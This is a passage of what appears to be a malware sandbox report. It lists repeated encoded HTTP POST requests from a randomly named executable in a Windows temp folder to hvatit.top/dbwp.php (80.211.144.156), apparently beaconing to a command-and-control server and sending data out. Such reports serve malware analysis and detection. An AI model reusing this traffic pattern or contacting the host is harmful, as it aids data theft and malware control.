                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 1e 24 38 31 0d 37 05 26 10 2a 2c 2d 1c 27 0e 3c 00 2c 1f 31 00 29 00 34 07 3e 2a 33 08 33 5b 23 03 25 3b 3a 54 31 3c 27 0c 33 0e 21 5b 07 10 21 00 26 3e 2f 5c 2f 02 32 5b 26 33 35 13 23 1f 2e 5e 2a 03 25 5c 20 28 36 04 33 06 31 0b 3b 00 36 51 3c 3e 24 01 2a 28 24 58 32 28 2b 50 00 12 26 50 26 06 28 56 35 2d 22 5b 23 38 24 0a 33 35 01 1d 23 2b 23 03 3c 3b 29 56 24 2c 00 54 23 23 3a 07 32 22 32 5a 3c 10 0e 0a 29 16 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #$817&*,-'<,1)4>*33[#%;:T1<'3![!&>/\/2[&35#.^*%\ (631;6Q<>$*($X2(+P&P&(V5-"[#8$35#+#<;)V$,T##:2"2Z<)&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        101192.168.2.44983880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:33.347409010 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:33.693012953 CEST2560OUTData Raw: 5a 5f 59 57 5a 59 55 52 5d 5f 54 57 54 5f 5b 52 5a 5c 59 5a 52 5c 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_YWZYUR]_TWT_[RZ\YZR\TZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'!"D?9#5>[.,#4&*0'<;0<<U;!]'/Z,
                                                        Aug 31, 2024 09:33:34.029907942 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:34.163690090 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        102192.168.2.44983980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:34.286052942 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:34.630570889 CEST2560OUTData Raw: 5a 55 5c 51 5a 59 55 56 5d 5f 54 57 54 5e 5b 54 5a 56 59 53 52 57 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZU\QZYUV]_TWT^[TZVYSRWTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-0W.?)W".?-, #3)<W33.+=,S,!]'/Z,=
                                                        Aug 31, 2024 09:33:34.960659027 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:35.089466095 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        103192.168.2.44984080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:35.213412046 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:35.568140984 CEST2560OUTData Raw: 5a 5d 5c 55 5a 54 50 50 5d 5f 54 57 54 5e 5b 5c 5a 5c 59 5c 52 56 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z]\UZTPP]_TWT^[\Z\Y\RVTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&!"D<*$S6.,?,#;8W3*Q$54')*;,?Z(;!]'/Z,=
                                                        Aug 31, 2024 09:33:35.877520084 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:36.007858038 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        104192.168.2.44984180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:36.131462097 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:36.489836931 CEST2552OUTData Raw: 5f 58 5c 55 5a 5a 50 53 5d 5f 54 57 54 58 5b 56 5a 51 59 5d 52 5d 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _X\UZZPS]_TWTX[VZQY]R]T[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.02=:<!.49/,#+0<'%0>-<;'?#V,!]'/Z,-
                                                        Aug 31, 2024 09:33:36.811660051 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:36.933542013 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        105192.168.2.44984280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:37.054958105 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:37.411792040 CEST2560OUTData Raw: 5a 5a 5c 51 5a 54 50 53 5d 5f 54 57 54 59 5b 51 5a 52 59 5f 52 54 54 52 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZZ\QZTPS]_TWTY[QZRY_RTTRQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-$2:E+_$S#-7,/(#S3?'7Y3=9+8/]<;8!]'/Z,!
                                                        Aug 31, 2024 09:33:37.715974092 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:37.847181082 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        106192.168.2.44984380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:37.978431940 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:38.333641052 CEST2552OUTData Raw: 5a 59 5c 54 5f 58 50 5d 5d 5f 54 57 54 58 5b 5c 5a 50 59 5d 52 54 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZY\T_XP]]_TWTX[\ZPY]RTT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3-+_<"X;.Z'Y <' V$('-.+8/X+Z;S,?!]'/Z,
                                                        Aug 31, 2024 09:33:38.662533998 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:38.795986891 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        107192.168.2.44984480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:38.930417061 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        108192.168.2.44984580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:39.002532959 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1408
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:39.349359989 CEST1408OUTData Raw: 5a 5e 59 51 5f 5a 50 55 5d 5f 54 57 54 5f 5b 56 5a 57 59 59 52 51 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z^YQ_ZPU]_TWT_[VZWYYRQTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&!<+!>$-<,4]4W&*$Q'67Z0-*+3X+7/?!]'/Z,
                                                        Aug 31, 2024 09:33:39.668941975 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:39.796642065 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 52 33 06 3a 13 23 38 2e 52 3e 12 39 54 26 33 3b 5a 2e 21 2a 5b 29 17 28 07 3e 2a 0a 50 25 2d 2c 1c 24 3b 29 0d 25 59 37 0b 27 24 21 5b 07 10 22 59 26 2e 0e 02 2d 2c 2d 02 32 30 26 03 34 31 26 16 2a 3e 21 58 36 02 2a 07 24 5e 3a 52 38 39 00 54 2a 3d 23 5a 28 28 3c 58 26 02 2b 50 00 12 26 19 26 2f 38 57 22 58 39 06 23 38 3f 57 30 1b 23 5a 23 15 28 58 3c 28 21 11 30 05 39 0f 23 30 03 58 25 31 39 02 3c 2d 37 53 29 3c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #R3:#8.R>9T&3;Z.!*[)(>*P%-,$;)%Y7'$!["Y&.-,-20&41&*>!X6*$^:R89T*=#Z((<X&+P&&/8W"X9#8?W0#Z#(X<(!09#0X%19<-7S)<&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        109192.168.2.44984680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:39.118405104 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:39.474209070 CEST2560OUTData Raw: 5a 58 59 50 5a 5a 50 5d 5d 5f 54 57 54 5a 5b 56 5a 52 59 52 52 56 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZXYPZZP]]_TWTZ[VZRYRRVT[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.3!-+9 S5>-8#;33)7$,'.1<,?, ,?!]'/Z,-
                                                        Aug 31, 2024 09:33:39.802839994 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:39.935904026 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        110192.168.2.44984780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:40.062844038 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:40.411904097 CEST2560OUTData Raw: 5f 5a 5c 51 5a 5f 50 5d 5d 5f 54 57 54 50 5b 56 5a 5c 59 5d 52 54 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _Z\QZ_P]]_TWTP[VZ\Y]RTT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'<8R6> ,,4 0W3*'$''[.<$</;S8!]'/Z,
                                                        Aug 31, 2024 09:33:40.735538960 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:40.937792063 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        111192.168.2.44984880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:41.068954945 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:41.427359104 CEST2560OUTData Raw: 5a 5e 59 5e 5a 54 55 57 5d 5f 54 57 54 5f 5b 56 5a 5c 59 5a 52 53 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z^Y^ZTUW]_TWT_[VZ\YZRST\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.X$15<*$S6<[:?87;'43680>:T('^<<;.?!]'/Z,
                                                        Aug 31, 2024 09:33:41.754949093 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:41.887732029 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        112192.168.2.44984980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:42.011873960 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:42.365065098 CEST2560OUTData Raw: 5a 55 59 54 5a 5a 50 5c 5d 5f 54 57 54 59 5b 51 5a 57 59 52 52 5d 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZUYTZZP\]_TWTY[QZWYRR]TXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z$!?)S6= -,8#8+0$Q0+_'>>U<0<<#;/!]'/Z,!
                                                        Aug 31, 2024 09:33:42.677018881 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:42.803998947 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        113192.168.2.44985080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:42.930027962 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:43.286726952 CEST2560OUTData Raw: 5a 54 59 5f 5a 5a 55 57 5d 5f 54 57 54 50 5b 53 5a 5c 59 5c 52 5d 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTY_ZZUW]_TWTP[SZ\Y\R]T[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.[01!<*<R"=7.<84 T0 T0'>%+;,+;R,!]'/Z,
                                                        Aug 31, 2024 09:33:43.596018076 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:43.786657095 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        114192.168.2.44985180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:43.915952921 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:44.271217108 CEST2560OUTData Raw: 5a 5a 5c 55 5f 5a 50 54 5d 5f 54 57 54 5b 5b 56 5a 56 59 53 52 53 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZZ\U_ZPT]_TWT[[VZVYSRST]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.$"5+U!?-?+7+':(P3+'-:?#<,7//!]'/Z,)
                                                        Aug 31, 2024 09:33:44.578063011 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:44.711791039 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        115192.168.2.44985280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:44.808589935 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        116192.168.2.44985380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
